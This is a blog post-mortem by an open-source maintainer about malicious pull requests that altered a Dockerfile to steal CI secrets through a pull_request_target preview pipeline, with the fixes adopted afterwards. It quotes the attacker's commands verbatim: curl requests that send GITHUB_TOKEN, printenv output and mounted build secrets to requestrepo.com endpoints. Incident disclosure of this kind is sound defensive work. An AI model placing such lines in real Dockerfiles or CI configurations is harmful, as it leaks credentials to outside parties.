Yesterday I saw a new PR on our open-source repo. The title was just t, and actually there were 7 of them. The descriptions were all empty, and the GitHub account didn't look legit either: it was created recently and named arc-switch.

This is a small post to document what happened and what we changed.

The PR

nao is open-source. We get PRs from external contributors every day, and we decided a while ago to deploy a preview of each PR so we can test it during the review process. To do that, the CI pipeline builds the corresponding Docker image and deploys it to a preview VM.

So yesterday the attacker (let's call him that way) opened 7 PRs, proposing changes in the Dockerfile to try to exfiltrate our secrets and envs. Because of this preview feature, the CI pipeline ran, built the Docker image and deployed it to our preview env. Which means the attacker was able to exfiltrate some temporary secrets and some keys.

Before I jump in, we already rotated the 2 important keys that were exposed: an OpenAI API key and a GitHub OAuth secret. The rest was mainly temporary secrets or public stuff.

So the attacker tried multiple ways to exfiltrate the secrets via the Dockerfile. To do it, he added multiple kinds of lines in the Dockerfile that all tried to curl some public URL.

The first change tried to get the GITHUB_TOKEN with a simple:

RUN echo $GITHUB_TOKEN | curl -X POST -d @- https://[redacted].requestrepo.com

What it does is take the content of the GITHUB_TOKEN environment variable and send it to a public website on which you can see the content of all the requests hitting that specific URL.

Then he tried to printenv in the Dockerfile:

RUN printenv | base64 | curl -X POST -d @-  https://[redacted].requestrepo.com

Then he tried to attack the Docker build cache to read other kinds of secrets (among all the secrets below only GITHUB_TOKEN is available as a mounted secret):

RUN --mount=type=secret,id=GITHUB_TOKEN \
    --mount=type=secret,id=GH_TOKEN \
    --mount=type=secret,id=NPM_TOKEN \
    --mount=type=secret,id=DOCKERHUB_TOKEN \
    --mount=type=secret,id=OPENAI_API_KEY \
    --mount=type=secret,id=ANTHROPIC_API_KEY \
    sh -c 'for s in GITHUB_TOKEN GH_TOKEN NPM_TOKEN DOCKERHUB_TOKEN OPENAI_API_KEY ANTHROPIC_API_KEY; do [ -f "/run/secrets/$s" ] && curl -X POST https://lvfqk2pj.requestrepo.com -H "Content-Type: text/plain" --data "$(printf "%s:" "$s"; base64 -w0 "/run/secrets/$s")" || true; done'

And the last one (which was the scariest) replaced the entrypoint of the container to print all the env variables at runtime.

CMD sh -c "printenv | base64 | curl -X POST -d @-  https://lvfqk2pj.requestrepo.com"

Why it worked and what got stolen

The reason it worked is simple: in our pr-preview CI pipeline we act on the pull_request_target event, which for an open-source repo is an attack vector. This event gives write access to the GITHUB_TOKEN in the CI context to the PR author, and we learned it the hard way. If I'm not mistaken, it was the same kind of attack Tanstack got hit by a few weeks ago.

The aftermath was not that bad: among all the secrets and envs exposed, only OPENAI_API_KEY and GITHUB_CLIENT_SECRET leaked, and we quickly rotated them. All the other secrets were disposable and public.

What we changed

To avoid this kind of attack we added a gate to the pr-preview CI pipeline. We already have an APPROVED_CONTRIBUTORS file in the repo that contains the contributors we accepted through an lgtm process when they open an issue (the same way the Pi agent does it).

So now only APPROVED_CONTRIBUTORS can trigger a preview build, meaning we only do it for trusted contributors.

Another solution might be to add a second gate that evaluates the PR content security-wise (using an LLM) and only allows the pipeline to continue if the PR is safe. I think it could be a good combination with the first gate.

Conclusion

This post is mainly feedback on what happened and what we changed. I think this kind of attack happens a lot, but it's the first one for us, and we are building the security gates as we move forward on our open-source project. Another important learning is that I had deactivated most of the GitHub notifications because they used to spam me too much, but since GitHub has become my home as we embarked on the open-source journey, I saw the PRs as they came and was able to react quickly.

The most terrifying part is that today the PRs have disappeared and the GitHub account has also been deleted. So this is the kind of attack that can happen without you even noticing.